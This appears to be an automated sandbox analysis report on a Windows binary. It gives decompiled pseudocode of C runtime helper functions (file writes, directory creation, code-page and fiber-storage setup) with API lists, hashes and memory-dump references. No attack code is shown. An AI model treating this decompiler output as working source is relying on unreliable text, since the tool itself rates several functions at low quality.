LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,0016CFE0,00000000,00000000,?,0018A49B,0016CFE0,00000000,00000000,00000000,?,0018A698,00000006,FlsSetValue), ref: 0018A526
GetLastError.KERNEL32(?,0018A49B,0016CFE0,00000000,00000000,00000000,?,0018A698,00000006,FlsSetValue,00197348,00197350,00000000,00000364,?,00189077), ref: 0018A532
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0018A49B,0016CFE0,00000000,00000000,00000000,?,0018A698,00000006,FlsSetValue,00197348,00197350,00000000), ref: 0018A540

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: a24e8063ea8d44b7f1558ee4e7a8c283d0e29ba27b426823f5a6daa74ae47445
Instruction ID: bf07c14d01d955b8674ce6e4af1028739f7b9aaac0399e731bc7e36d4a4fda18
Opcode Fuzzy Hash: a24e8063ea8d44b7f1558ee4e7a8c283d0e29ba27b426823f5a6daa74ae47445
Instruction Fuzzy Hash: A8012B36711222ABD7319B68AC44A577B58AF45BA17550523F916D3140D731EF80CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 00169F2F, Relevance: 4.6, APIs: 3, Instructions: 107
fileCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00169F2F(void* __edx, void* _a4, long _a8) {
				char _v4;
				long _v8;
				void* __ecx;
				void* __ebp;
				int _t28;
				intOrPtr _t31;
				long _t36;
				int _t39;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t50;
				void* _t58;
				intOrPtr _t62;
				void* _t66;
				long _t68;

				_t58 = __edx;
				_t68 = _a8;
				_t49 = _t50;
				if(_t68 != 0) {
					if( *((intOrPtr*)(_t49 + 0xc)) == 1) {
						 *(_t49 + 4) = GetStdHandle(0xfffffff5);
					}
					while(1) {
						do {
							_v8 = _v8 & 0x00000000;
							_v4 = 0;
							if( *((intOrPtr*)(_t49 + 0xc)) == 0) {
								_t28 = WriteFile( *(_t49 + 4), _a4, _t68,  &_v8, 0); // executed
								asm("sbb al, al");
								_t31 =  ~(_t28 - 1) + 1;
								_v4 = _t31;
								L14:
								if(_t31 != 0) {
									L22:
									 *((char*)(_t49 + 8)) = 1;
									return _v4;
								}
								L15:
								if( *((char*)(_t49 + 0x1a)) == 0 ||  *((intOrPtr*)(_t49 + 0xc)) != 0) {
									goto L22;
								} else {
									_t65 = _t49 + 0x24;
									if(E00166E18(0x1a0f50, _t49 + 0x24, 0) == 0) {
										E00167061(0x1a0f50, _t68, 0, _t65);
										goto L22;
									}
									goto L18;
								}
							}
							_t66 = 0;
							if(_t68 == 0) {
								goto L15;
							} else {
								goto L8;
							}
							while(1) {
								L8:
								_t36 = _t68 - _t66;
								if(_t36 >= 0x4000) {
									_t36 = 0x4000;
								}
								_t39 = WriteFile( *(_t49 + 4), _a4 + _t66, _t36,  &_v8, 0);
								asm("sbb al, al");
								_t31 =  ~(_t39 - 1) + 1;
								_v4 = _t31;
								if(_t31 == 0) {
									goto L15;
								}
								_t66 = _t66 + 0x4000;
								if(_t66 < _t68) {
									continue;
								}
								goto L14;
							}
							goto L15;
							L18:
						} while (_v8 >= _t68 || _v8 <= 0);
						_t62 =  *_t49;
						 *0x193260(0);
						_t43 =  *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14))))();
						asm("sbb edx, 0x0");
						 *0x193260(_t43 - _v8, _t58);
						 *((intOrPtr*)(_t62 + 0x10))();
					}
				}
				return 1;
			}

0x00169f2f
0x00169f33
0x00169f37
0x00169f3b
0x00169f48
0x00169f52
0x00169f52
0x00169f57
0x00169f5c
0x00169f5c
0x00169f65
0x00169f6a
0x00169fb8
0x00169fc1
0x00169fc3
0x00169fc5
0x00169fc9
0x00169fcb
0x0016a03e
0x0016a043
0x00000000
0x0016a047
0x00169fcd
0x00169fd1
0x00000000
0x00169fd9
0x00169fdb
0x00169feb
0x0016a039
0x00000000
0x0016a039
0x00000000
0x00169feb
0x00169fd1
0x00169f6c
0x00169f70
0x00000000
0x00000000
0x00000000
0x00000000
0x00169f72
0x00169f72
0x00169f74
0x00169f78
0x00169f7a
0x00169f7a
0x00169f8e
0x00169f97
0x00169f99
0x00169f9b
0x00169f9f
0x00000000
0x00000000
0x00169fa1
0x00169fa5
0x00000000
0x00000000
0x00000000
0x00169fa7
0x00000000
0x00169fed
0x00169fed
0x0016a002
0x0016a00b
0x0016a013
0x0016a01c
0x0016a021
0x0016a029
0x0016a029
0x00169f57
0x00000000

APIs

GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0016CC94,00000001,?,?,?,00000000,00174ECD,?,?,?), ref: 00169F4C
WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00174ECD,?,?,?,?,?,00174972,?), ref: 00169F8E
WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0016CC94,00000001,?,?), ref: 00169FB8

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 28e77856f4a6c7871c005950788ce620eea5cd5dc89988c160de7c97fe86bb1a
Instruction ID: ff4d6923b99a3b6b80a0d6187377aecc0e2bdfad65ab9de3fdfb618ab1c8558a
Opcode Fuzzy Hash: 28e77856f4a6c7871c005950788ce620eea5cd5dc89988c160de7c97fe86bb1a
Instruction Fuzzy Hash: 223100312083059BDF148F24DD48B6BBFA8EF91B10F05469AF845EB281CB75DC58CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0016A207, Relevance: 4.6, APIs: 3, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0016A207(void* __ecx, void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
				short _v4100;
				signed int _t8;
				long _t10;
				void* _t11;
				int _t18;
				WCHAR* _t21;

				E0017E360();
				_t21 = _a4;
				_t8 =  *(E0016BC69(__eflags, _t21)) & 0x0000ffff;
				if(_t8 == 0x2e || _t8 == 0x20) {
					L3:
					if(E0016A180(_t21) != 0 || E0016B66C(_t21,  &_v4100, 0x800) == 0 || CreateDirectoryW( &_v4100, 0) == 0) {
						_t10 = GetLastError();
						__eflags = _t10 - 2;
						if(_t10 == 2) {
							L12:
							_t11 = 2;
						} else {
							__eflags = _t10 - 3;
							if(_t10 == 3) {
								goto L12;
							} else {
								_t11 = 1;
							}
						}
					} else {
						goto L6;
					}
				} else {
					_t18 = CreateDirectoryW(_t21, 0); // executed
					if(_t18 != 0) {
						L6:
						if(_a8 != 0) {
							E0016A444(_t21, _a12); // executed
						}
						_t11 = 0;
					} else {
						goto L3;
					}
				}
				return _t11;
			}

0x0016a20f
0x0016a215
0x0016a21e
0x0016a224
0x0016a238
0x0016a240
0x0016a27e
0x0016a284
0x0016a287
0x0016a293
0x0016a295
0x0016a289
0x0016a289
0x0016a28c
0x00000000
0x0016a28e
0x0016a290
0x0016a290
0x0016a28c
0x00000000
0x00000000
0x00000000
0x0016a22b
0x0016a22e
0x0016a236
0x0016a26b
0x0016a26f
0x0016a275
0x0016a275
0x0016a27a
0x00000000
0x00000000
0x00000000
0x0016a236
0x0016a29a

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0016A113,?,00000001,00000000,?,?), ref: 0016A22E
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0016A113,?,00000001,00000000,?,?), ref: 0016A261
GetLastError.KERNEL32(?,?,?,?,0016A113,?,00000001,00000000,?,?), ref: 0016A27E

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: 78229e4e0754adecf0fc2e564a28ccf9714520ba57007a1066c4c798fa4ae291
Instruction ID: 0d52f02c6668a5c43058d7402212643c582e300cbd2ed84fb49532a5f0383b4e
Opcode Fuzzy Hash: 78229e4e0754adecf0fc2e564a28ccf9714520ba57007a1066c4c798fa4ae291
Instruction Fuzzy Hash: DB01F53118121466DF329BB54C55BFD7748BF1B781F88445AF805F5051DB62CAA0CEB3

Uniqueness

Uniqueness Score: -1.00%

Function 0018AFF4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0018AFF4(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed int _v1828;
				signed int _t63;
				void* _t67;
				signed int _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t86;
				char _t87;
				char _t90;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t96;
				char* _t97;
				intOrPtr _t101;
				signed int _t102;

				_t95 = __edx;
				_t63 =  *0x19e668; // 0xd6971696
				_v8 = _t63 ^ _t102;
				_t101 = _a4;
				_t4 = _t101 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t101 + 0x119; // 0x18b646
					_t96 = _t47;
					_t90 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t96;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t97 = _t96 + _t90;
						_t69 = _t68 + _t97;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t97 = 0;
							} else {
								_t72 = _t101 + _t90;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t90 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
							_t54 = _t90 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t97 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t101 + 0x119; // 0x18b646
						_t96 = _t61;
						_t90 = _t90 + 1;
						__eflags = _t90 - 0x100;
					} while (_t90 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t93 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t108 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t95 =  *(_t93 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t95;
							if(_t76 > _t95) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t93 = _t93 + 2;
						__eflags = _t93;
						_t75 =  *_t93;
					}
					_t13 = _t101 + 4; // 0x5efc4d8b
					E0018C099(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t101 + 4; // 0x5efc4d8b
					_t19 = _t101 + 0x21c; // 0x7d8b57fc
					E0018A275(0x100, _t101, _t108, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
					_t21 = _t101 + 4; // 0x5efc4d8b
					_t23 = _t101 + 0x21c; // 0x7d8b57fc
					E0018A275(0x100, _t101, _t108, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t94 = 0;
					do {
						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								 *((char*)(_t101 + _t94 + 0x119)) = 0;
							} else {
								_t37 = _t101 + _t94 + 0x19;
								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
								goto L15;
							}
						} else {
							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
							L15:
							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
						}
						_t94 = _t94 + 1;
					} while (_t94 < 0x100);
				}
				return E0017EC4A(_v8 ^ _t102);
			}

0x0018aff4
0x0018afff
0x0018b006
0x0018b00b
0x0018b016
0x0018b028
0x0018b120
0x0018b120
0x0018b126
0x0018b128
0x0018b129
0x0018b129
0x0018b12b
0x0018b131
0x0018b131
0x0018b133
0x0018b135
0x0018b13e
0x0018b141
0x0018b14d
0x0018b154
0x0018b164
0x0018b156
0x0018b156
0x0018b159
0x0018b159
0x0018b159
0x0018b15d
0x0018b15d
0x00000000
0x0018b15d
0x0018b143
0x0018b143
0x0018b148
0x0018b148
0x0018b160
0x0018b160
0x0018b160
0x0018b166
0x0018b16c
0x0018b16c
0x0018b172
0x0018b173
0x0018b173
0x0018b02e
0x0018b02e
0x0018b030
0x0018b030
0x0018b037
0x0018b038
0x0018b03c
0x0018b042
0x0018b048
0x0018b070
0x0018b070
0x0018b072
0x00000000
0x00000000
0x0018b051
0x0018b055
0x0018b067
0x0018b067
0x0018b069
0x00000000
0x00000000
0x0018b05a
0x0018b05c
0x0018b05e
0x0018b066
0x0018b066
0x00000000
0x0018b066
0x00000000
0x0018b05c
0x0018b06b
0x0018b06b
0x0018b06e
0x0018b06e
0x0018b075
0x0018b08a
0x0018b090
0x0018b0a4
0x0018b0ab
0x0018b0ba
0x0018b0cc
0x0018b0d3
0x0018b0db
0x0018b0dd
0x0018b0dd
0x0018b0e7
0x0018b0f7
0x0018b0f9
0x0018b110
0x0018b0fb
0x0018b0fb
0x0018b0fb
0x0018b0fb
0x0018b100
0x00000000
0x0018b100
0x0018b0e9
0x0018b0e9
0x0018b0ee
0x0018b107
0x0018b107
0x0018b107
0x0018b117
0x0018b118
0x0018b11c
0x0018b187

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0018B019

Strings

, xrefs: 0018B05E

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: b9f605c461a952e2f1416d87d98581a62943f5e402a19cb9e7d23b6ec8d951b6
Instruction ID: 2f834747adbc4fc0674609033825898972c897ac622559803b65919315242a57
Opcode Fuzzy Hash: b9f605c461a952e2f1416d87d98581a62943f5e402a19cb9e7d23b6ec8d951b6
Instruction Fuzzy Hash: 7341267050834C9ADF269A648CD4AF7BBB9EB55304F2404EDE59A8B142D3359B45CF20

Uniqueness

Uniqueness Score: -1.00%

Function 0018A72C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E0018A72C(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t20;
				intOrPtr* _t31;
				signed int _t33;

				_t26 = __ecx;
				_push(__ecx);
				_t18 =  *0x19e668; // 0xd6971696
				_v8 = _t18 ^ _t33;
				_push(__esi);
				_t20 = E0018A458(0x16, "LCMapStringEx", 0x197374, "LCMapStringEx"); // executed
				_t31 = _t20;
				if(_t31 == 0) {
					LCMapStringW(E0018A7B4(_t26, _t31, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0x193260(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					 *_t31();
				}
				return E0017EC4A(_v8 ^ _t33);
			}

0x0018a72c
0x0018a731
0x0018a732
0x0018a739
0x0018a73c
0x0018a74e
0x0018a753
0x0018a75a
0x0018a79d
0x0018a75c
0x0018a779
0x0018a77f
0x0018a77f
0x0018a7b1

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0018A79D

Strings

LCMapStringEx, xrefs: 0018A73D, 0018A747

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: df27f71b8a9f8d57aa91ece48a238031a06856c0b067f13d056264f1da9ef011
Instruction ID: 2a96f0defa5fe0a4837c2c57dcb35008997a019e536ed73bd88d0a4937985536
Opcode Fuzzy Hash: df27f71b8a9f8d57aa91ece48a238031a06856c0b067f13d056264f1da9ef011
Instruction Fuzzy Hash: 3D01D332544209BBDF02AFA0DC05DAE7FA6FF18750F454155FE1825160CB729A71BB91

Uniqueness

Uniqueness Score: -1.00%

Function 0018A6CA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E0018A6CA(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t8;
				intOrPtr* _t10;
				intOrPtr* _t20;
				signed int _t22;

				_push(__ecx);
				_t8 =  *0x19e668; // 0xd6971696
				_v8 = _t8 ^ _t22;
				_t10 = E0018A458(0x14, "InitializeCriticalSectionEx", 0x19736c, 0x197374); // executed
				_t20 = _t10;
				if(_t20 == 0) {
					InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0x193260(_a4, _a8, _a12);
					 *_t20();
				}
				return E0017EC4A(_v8 ^ _t22);
			}

0x0018a6cf
0x0018a6d0
0x0018a6d7
0x0018a6ec
0x0018a6f1
0x0018a6f8
0x0018a715
0x0018a6fa
0x0018a705
0x0018a70b
0x0018a70b
0x0018a729

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00189D2F), ref: 0018A715

Strings

InitializeCriticalSectionEx, xrefs: 0018A6E5

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: a1ccc9daf4f829f9d6e716bc8db3bd9d7b3e8e02d48599c4955fbc26a34b1292
Instruction ID: 4c7242056fa1a7db4cc04befe903494097bacba479f6d600bc894aefd0c136e3
Opcode Fuzzy Hash: a1ccc9daf4f829f9d6e716bc8db3bd9d7b3e8e02d48599c4955fbc26a34b1292
Instruction Fuzzy Hash: C0F0BE3164520CBBCF016F60CC06CAE7FA1EF18720B408066FC192A260DB725F50BB91

Uniqueness

Uniqueness Score: -1.00%

Function 0018A56F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E0018A56F(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t4;
				intOrPtr* _t6;
				intOrPtr* _t16;
				signed int _t18;

				_push(__ecx);
				_t4 =  *0x19e668; // 0xd6971696
				_v8 = _t4 ^ _t18;
				_t6 = E0018A458(3, "FlsAlloc", 0x197330, 0x197338); // executed
				_t16 = _t6;
				if(_t16 == 0) {
					TlsAlloc();
				} else {
					 *0x193260(_a4);
					 *_t16();
				}
				return E0017EC4A(_v8 ^ _t18);
			}

0x0018a574
0x0018a575
0x0018a57c
0x0018a591
0x0018a596
0x0018a59d
0x0018a5ae
0x0018a59f
0x0018a5a4
0x0018a5aa
0x0018a5aa
0x0018a5c2

APIs

TlsAlloc.KERNEL32 ref: 0018A5AE

Strings

FlsAlloc, xrefs: 0018A58A

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 865b0ed16c4c03e990e87bfdd6538ffb44e262ea1711f00ef9d40295ca86ba1c
Instruction ID: 9b768710d06cf5c26c748dd7edf45ea3ce00a9c6d14f04817aab19a2bc5ab644
Opcode Fuzzy Hash: 865b0ed16c4c03e990e87bfdd6538ffb44e262ea1711f00ef9d40295ca86ba1c
Instruction Fuzzy Hash: BCE055707452287BDB11BB60CC068AEBBA0DF25B10B810157FC0427280DF700F40ABD6

Uniqueness

Uniqueness Score: -1.00%

Function 0018329A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0018329A(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t2;
				intOrPtr* _t6;

				_t2 = E00183179(4, "FlsAlloc", 0x195684, "FlsAlloc"); // executed
				_t6 = _t2;
				if(_t6 == 0) {
					return TlsAlloc();
				}
				L0017ECF0();
				return  *_t6(_a4);
			}

0x001832af
0x001832b4
0x001832bb
0x001832ce
0x001832ce
0x001832c2
0x001832cb

APIs

try_get_function.LIBVCRUNTIME ref: 001832AF

Strings

FlsAlloc, xrefs: 0018329E, 001832A8

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: 2f75cad37f5c01d17e551b639ba9e3f0b5cb8332c3b745cd3a72dac45f8444d5
Instruction ID: f75fe5c20bcb5f85ae934af5992744e4f24a3a5c727eeaad5d2ebc9dc327d6cd
Opcode Fuzzy Hash: 2f75cad37f5c01d17e551b639ba9e3f0b5cb8332c3b745cd3a72dac45f8444d5
Instruction Fuzzy Hash: BBD02B627806346ADA1232C06C039AE7E558701FB5F490162FF1C3A142C761464007C6

Uniqueness

Uniqueness Score: -1.00%

Function 0018B350, Relevance: 3.2, APIs: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0018B350(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed char _t62;
				signed int _t63;
				signed char* _t72;
				signed char* _t73;
				int _t78;
				signed int _t81;
				signed char* _t82;
				short* _t83;
				int _t87;
				signed char _t88;
				signed int _t89;
				signed int _t91;
				signed int _t92;
				int _t94;
				int _t95;
				intOrPtr _t98;
				signed int _t99;

				_t48 =  *0x19e668; // 0xd6971696
				_v8 = _t48 ^ _t99;
				_t98 = _a8;
				_t78 = E0018AF1B(__eflags, _a4);
				if(_t78 != 0) {
					_t94 = 0;
					__eflags = 0;
					_t81 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0x19e828)) - _t78;
						if( *((intOrPtr*)(_t51 + 0x19e828)) == _t78) {
							break;
						}
						_t81 = _t81 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t81;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t78 - 0xfde8;
							if(_t78 == 0xfde8) {
								L23:
							} else {
								__eflags = _t78 - 0xfde9;
								if(_t78 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t78,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0x1c16cc - _t94; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E0018AF8E(_t98);
												goto L37;
											}
										} else {
											E0017F350(_t94, _t98 + 0x18, _t94, 0x101);
											 *(_t98 + 4) = _t78;
											 *(_t98 + 0x21c) = _t94;
											_t78 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t98 + 8) = _t94;
											} else {
												__eflags = _v22;
												_t72 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t88 = _t72[1];
														__eflags = _t88;
														if(_t88 == 0) {
															goto L16;
														}
														_t91 = _t88 & 0x000000ff;
														_t89 =  *_t72 & 0x000000ff;
														while(1) {
															__eflags = _t89 - _t91;
															if(_t89 > _t91) {
																break;
															}
															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
															_t89 = _t89 + 1;
															__eflags = _t89;
														}
														_t72 =  &(_t72[2]);
														__eflags =  *_t72;
														if( *_t72 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t73 = _t98 + 0x1a;
												_t87 = 0xfe;
												do {
													 *_t73 =  *_t73 | 0x00000008;
													_t73 =  &(_t73[1]);
													_t87 = _t87 - 1;
													__eflags = _t87;
												} while (_t87 != 0);
												 *(_t98 + 0x21c) = E0018AEDD( *(_t98 + 4));
												 *(_t98 + 8) = _t78;
											}
											_t95 = _t98 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E0018AFF4(_t78, _t91, _t95, _t98, _t98); // executed
											L37:
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					E0017F350(_t94, _t98 + 0x18, _t94, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0x19e838;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t82 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t82[1];
